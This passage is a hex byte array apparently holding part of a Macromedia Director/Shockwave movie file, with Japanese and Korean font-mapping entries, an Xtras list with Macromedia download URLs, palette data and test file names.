0x69, 0x6C, 0x6C, 0x20, 0x62, 0x65, 0x20, 0x75, 0x73, 0x65, 0x64, 0x2E, 0x0D, 0x0D, 0x3B, 0x20,
0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61,
0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x0D, 0x3B, 0x20, 0x0D, 0x3B, 0x20, 0x54, 0x68, 0x65, 0x20,
0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65,
0x73, 0x65, 0x20, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x69, 0x73,
0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x20, 0x74, 0x6F, 0x20, 0x61, 0x20, 0x57, 0x69, 0x6E,
0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x2C, 0x20, 0x61, 0x6E, 0x64, 0x20, 0x0D,
0x3B, 0x20, 0x61, 0x6C, 0x6C, 0x20, 0x57, 0x69, 0x6E, 0x64, 0x6F, 0x77, 0x73, 0x20, 0x66, 0x6F,
0x6E, 0x74, 0x73, 0x20, 0x61, 0x72, 0x65, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x65, 0x64, 0x20, 0x74,
0x6F, 0x20, 0x4D, 0x61, 0x63, 0x69, 0x6E, 0x74, 0x6F, 0x73, 0x68, 0x27, 0x73, 0x20, 0x4F, 0x73,
0x61, 0x6B, 0x61, 0x2E, 0x20, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x20, 0x69,
0x73, 0x20, 0x75, 0x73, 0x65, 0x64, 0x0D, 0x3B, 0x20, 0x62, 0x65, 0x63, 0x61, 0x75, 0x73, 0x65,
0x20, 0x6F, 0x6E, 0x6C, 0x79, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x20, 0x66, 0x6F, 0x6E, 0x74,
0x73, 0x20, 0x6E, 0x65, 0x65, 0x64, 0x20, 0x75, 0x70, 0x70, 0x65, 0x72, 0x2D, 0x41, 0x53, 0x43,
0x49, 0x49, 0x20, 0x63, 0x68, 0x61, 0x72, 0x61, 0x63, 0x74, 0x65, 0x72, 0x73, 0x20, 0x6D, 0x61,
0x70, 0x70, 0x65, 0x64, 0x2E, 0x20, 0x20, 0x54, 0x6F, 0x20, 0x70, 0x72, 0x65, 0x76, 0x65, 0x6E,
0x74, 0x20, 0x0D, 0x3B, 0x20, 0x6D, 0x61, 0x70, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x6F, 0x66, 0x20,
0x61, 0x6E, 0x79, 0x20, 0x61, 0x64, 0x64, 0x69, 0x74, 0x69, 0x6F, 0x6E, 0x61, 0x6C, 0x20, 0x4A,
0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x2C, 0x20, 0x61,
0x64, 0x64, 0x20, 0x74, 0x68, 0x65, 0x6D, 0x20, 0x74, 0x6F, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20,
0x6C, 0x69, 0x73, 0x74, 0x2E, 0x0D, 0x3B, 0x0D, 0x3B, 0x20, 0x4E, 0x6F, 0x74, 0x65, 0x3A, 0x20,
0x49, 0x66, 0x20, 0x79, 0x6F, 0x75, 0x20, 0x64, 0x6F, 0x20, 0x6E, 0x6F, 0x74, 0x20, 0x68, 0x61,
0x76, 0x65, 0x20, 0x61, 0x20, 0x4A, 0x61, 0x70, 0x61, 0x6E, 0x65, 0x73, 0x65, 0x20, 0x73, 0x79,
0x73, 0x74, 0x65, 0x6D, 0x2C, 0x20, 0x74, 0x68, 0x65, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x20, 0x6E,
0x61, 0x6D, 0x65, 0x73, 0x20, 0x62, 0x65, 0x6C, 0x6F, 0x77, 0x20, 0x0D, 0x3B, 0x20, 0x77, 0x69,
0x6C, 0x6C, 0x20, 0x61, 0x70, 0x70, 0x65, 0x61, 0x72, 0x20, 0x74, 0x6F, 0x20, 0x62, 0x65, 0x20,
0x75, 0x6E, 0x72, 0x65, 0x61, 0x64, 0x61, 0x62, 0x6C, 0x65, 0x2E, 0x0D, 0x4D, 0x61, 0x63, 0x3A,
0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF, 0xBC, 0xB3, 0x20, 0xE3,
0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x4D, 0x61, 0x70,
0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF,
0xBC, 0xB3, 0x20, 0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22,
0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61,
0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEF, 0xBC, 0xAD, 0xEF,
0xBC, 0xB3, 0x20, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D,
0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20,
0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0xA8, 0x99, 0xE6, 0xBA, 0x96,
0xE3, 0x82, 0xB4, 0xE3, 0x82, 0xB7, 0xE3, 0x83, 0x83, 0xE3, 0x82, 0xAF, 0x22, 0x20, 0x20, 0x3D,
0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20,
0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0xA8, 0x99, 0xE6, 0xBA, 0x96,
0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,
0x4D, 0x61, 0x63, 0x3A, 0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F,
0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xE6, 0x98, 0x8E, 0xE6, 0x9C, 0x9D, 0x22, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A,
0x4F, 0x73, 0x61, 0x6B, 0x61, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D,
0x3B, 0x20, 0x4B, 0x6F, 0x72, 0x65, 0x61, 0x6E, 0x20, 0x46, 0x6F, 0x6E, 0x74, 0x20, 0x4D, 0x61,
0x70, 0x70, 0x69, 0x6E, 0x67, 0x73, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65,
0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69,
0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,
0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22,
0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65,
0x0D, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69,
0x6F, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B,
0xEC, 0x9B, 0x80, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x4D, 0x61,
0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94,
0xED, 0x83, 0x95, 0x22, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x0D, 0x57,
0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C,
0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65,
0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB5, 0xB4, 0xEB, 0xA6, 0xBC, 0xEC, 0xB2, 0xB4, 0x22,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41,
0x70, 0x70, 0x6C, 0x65, 0x47, 0x6F, 0x74, 0x68, 0x69, 0x63, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,
0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0x22,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63,
0x3A, 0x53, 0x65, 0x6F, 0x75, 0x6C, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D,
0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEA, 0xB6, 0x81, 0xEC, 0x84, 0x9C, 0xEC, 0xB2, 0xB4, 0x22, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x53, 0x65,
0x6F, 0x75, 0x6C, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E,
0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70, 0x70, 0x6C, 0x65, 0x4D,
0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D,
0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0x8F, 0x8B, 0xEC, 0x9B, 0x80, 0xEC, 0xB2, 0xB4, 0x22, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63, 0x3A, 0x41, 0x70,
0x70, 0x6C, 0x65, 0x4D, 0x79, 0x75, 0x6E, 0x67, 0x69, 0x6F, 0x20, 0x4D, 0x61, 0x70, 0x20, 0x4E,
0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83, 0x95, 0x22,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20, 0x4D, 0x61, 0x63,
0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x4D, 0x61, 0x70,
0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x57, 0x69, 0x6E, 0x3A, 0x22, 0xEB, 0xB0, 0x94, 0xED, 0x83,
0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3D, 0x3E, 0x20,
0x4D, 0x61, 0x63, 0x3A, 0x22, 0xED, 0x95, 0x9C, 0xEA, 0xB0, 0x95, 0xEC, 0xB2, 0xB4, 0x22, 0x20,
0x4D, 0x61, 0x70, 0x20, 0x4E, 0x6F, 0x6E, 0x65, 0x0D, 0x00, 0x6C, 0x52, 0x54, 0x58, 0x83, 0x04,
0x00, 0x00, 0x08, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00,
0x00, 0x18, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14,
0x00, 0x00, 0x00, 0x23, 0x06, 0x02, 0x10, 0x49, 0x4E, 0x65, 0x74, 0x55, 0x72, 0x6C, 0x20, 0x50,
0x50, 0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0B, 0x49, 0x4E, 0x45, 0x54, 0x55,
0x52, 0x4C, 0x2E, 0x58, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x18, 0x00,
0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x00, 0x00,
0x23, 0x06, 0x02, 0x10, 0x4E, 0x65, 0x74, 0x46, 0x69, 0x6C, 0x65, 0x20, 0x50, 0x50, 0x43, 0x20,
0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0B, 0x4E, 0x45, 0x54, 0x46, 0x49, 0x4C, 0x45, 0x2E,
0x58, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x4B, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x10,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x15, 0x00, 0x00, 0x00, 0x25, 0x06, 0x02,
0x11, 0x4E, 0x65, 0x74, 0x4C, 0x69, 0x6E, 0x67, 0x6F, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74,
0x72, 0x61, 0x00, 0x06, 0x05, 0x0C, 0x4E, 0x65, 0x74, 0x6C, 0x69, 0x6E, 0x67, 0x6F, 0x2E, 0x78,
0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0xCC, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x1E, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00,
0x6C, 0x00, 0x00, 0x00, 0x8A, 0x00, 0x00, 0x00, 0x9A, 0x06, 0x02, 0x1A, 0x53, 0x57, 0x41, 0x20,
0x44, 0x65, 0x63, 0x6F, 0x6D, 0x70, 0x72, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x50, 0x50,
0x43, 0x20, 0x58, 0x74, 0x72, 0x61, 0x00, 0x06, 0x05, 0x0C, 0x73, 0x77, 0x61, 0x64, 0x63, 0x6D,
0x70, 0x72, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x3A, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F,
0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D,
0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F,
0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73,
0x2F, 0x53, 0x57, 0x41, 0x00, 0x21, 0x02, 0x1A, 0x53, 0x57, 0x41, 0x20, 0x44, 0x65, 0x63, 0x6F,
0x6D, 0x70, 0x72, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x50, 0x50, 0x43, 0x20, 0x58, 0x74,
0x72, 0x61, 0x00, 0x41, 0x05, 0x0C, 0x73, 0x77, 0x61, 0x64, 0x63, 0x6D, 0x70, 0x72, 0x2E, 0x78,
0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x96, 0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x01, 0x12, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x00, 0x00, 0x00, 0x59, 0x00, 0x00, 0x00,
0x6C, 0x06, 0x05, 0x0F, 0x44, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x2E,
0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x42, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F,
0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69,
0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77,
0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x44, 0x69,
0x72, 0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x00, 0x41, 0x05, 0x0F, 0x44, 0x69, 0x72,
0x65, 0x63, 0x74, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00,
0xC5, 0x00, 0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x6D, 0x00, 0x00, 0x00, 0x7E, 0x00,
0x00, 0x00, 0x93, 0x06, 0x02, 0x0D, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74,
0x72, 0x6F, 0x6C, 0x00, 0x06, 0x05, 0x11, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E,
0x74, 0x72, 0x6F, 0x6C, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x43, 0x68, 0x74, 0x74, 0x70,
0x3A, 0x2F, 0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72,
0x6F, 0x6D, 0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73,
0x68, 0x6F, 0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72,
0x61, 0x73, 0x2F, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C, 0x00,
0x21, 0x02, 0x0D, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F, 0x6C,
0x00, 0x41, 0x05, 0x11, 0x53, 0x6F, 0x75, 0x6E, 0x64, 0x20, 0x43, 0x6F, 0x6E, 0x74, 0x72, 0x6F,
0x6C, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x00, 0x00, 0x91, 0x00, 0x00, 0x00, 0x18, 0x00, 0x01,
0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x57,
0x00, 0x00, 0x00, 0x67, 0x06, 0x02, 0x0C, 0x43, 0x6F, 0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F,
0x4D, 0x69, 0x78, 0x00, 0x01, 0x00, 0x43, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x64, 0x6F,
0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D, 0x65, 0x64, 0x69,
0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F, 0x63, 0x6B, 0x77,
0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73, 0x2F, 0x43, 0x6F,
0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x21, 0x02, 0x0C, 0x43, 0x6F,
0x72, 0x65, 0x41, 0x75, 0x64, 0x69, 0x6F, 0x4D, 0x69, 0x78, 0x00, 0x00, 0x00, 0x00, 0xC6, 0x00,
0x00, 0x00, 0x18, 0x01, 0x01, 0x01, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x11, 0x00, 0x00, 0x00, 0x26, 0x00, 0x00, 0x00, 0x6E, 0x00, 0x00, 0x00, 0x7F, 0x00, 0x00, 0x00,
0x94, 0x06, 0x02, 0x0D, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72,
0x73, 0x00, 0x06, 0x05, 0x11, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65,
0x72, 0x73, 0x2E, 0x78, 0x33, 0x32, 0x00, 0x01, 0x00, 0x44, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F,
0x2F, 0x64, 0x6F, 0x77, 0x6E, 0x6C, 0x6F, 0x61, 0x64, 0x2E, 0x6D, 0x61, 0x63, 0x72, 0x6F, 0x6D,
0x65, 0x64, 0x69, 0x61, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x75, 0x62, 0x2F, 0x73, 0x68, 0x6F,
0x63, 0x6B, 0x77, 0x61, 0x76, 0x65, 0x31, 0x31, 0x2E, 0x35, 0x2F, 0x78, 0x74, 0x72, 0x61, 0x73,
0x2F, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00, 0x21,
0x02, 0x0D, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73, 0x00,
0x41, 0x05, 0x11, 0x42, 0x69, 0x74, 0x6D, 0x61, 0x70, 0x46, 0x69, 0x6C, 0x74, 0x65, 0x72, 0x73,
0x2E, 0x78, 0x33, 0x32, 0x00, 0x00, 0x4C, 0x73, 0x43, 0x4D, 0x3A, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x0C, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x0C,
0x00, 0x00, 0x00, 0x14, 0x08, 0x49, 0x6E, 0x74, 0x65, 0x72, 0x6E, 0x61, 0x6C, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x04, 0x00, 0x53, 0x52, 0x45, 0x56, 0x0C, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x01, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x00, 0x02, 0x51, 0x4C, 0x4F, 0x43, 0x46,
0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11,
0x11, 0x11, 0x22, 0x22, 0x22, 0x33, 0x33, 0x33, 0x44, 0x44, 0x44, 0x55, 0x55, 0x55, 0x66, 0x66,
0x66, 0x77, 0x77, 0x77, 0x88, 0x88, 0x88, 0x99, 0x99, 0x99, 0xAA, 0xAA, 0xAA, 0xBB, 0xBB, 0xBB,
0xCC, 0xCC, 0xCC, 0xDD, 0xDD, 0xDD, 0xEE, 0xEE, 0xEE, 0xFF, 0xFF, 0xFF, 0x4C, 0x42, 0x55, 0x50,
0x99, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0D, 0x00, 0x00, 0x00, 0x02, 0x9C, 0x00, 0x00, 0x02,
0x76, 0xFF, 0xFF, 0xFF, 0x0C, 0x00, 0x00, 0x00, 0x44, 0x00, 0x00, 0x00, 0x65, 0x00, 0x00, 0x00,
0x66, 0x00, 0x00, 0x00, 0x61, 0x00, 0x00, 0x00, 0x75, 0x00, 0x00, 0x00, 0x6C, 0x00, 0x00, 0x00,
0x74, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x74, 0x00, 0x00, 0x00,
0x6D, 0x00, 0x00, 0x00, 0x6C, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00, 0x00,
0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00,
0x00, 0x74, 0x00, 0x00, 0x00, 0x6D, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45, 0x00,
0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x64, 0x00,
0x00, 0x00, 0x63, 0x00, 0x00, 0x00, 0x72, 0x08, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x45,
0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x6A,
0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x67, 0x0A, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00,
0x45, 0x00, 0x00, 0x00, 0x53, 0x00, 0x00, 0x00, 0x54, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00,
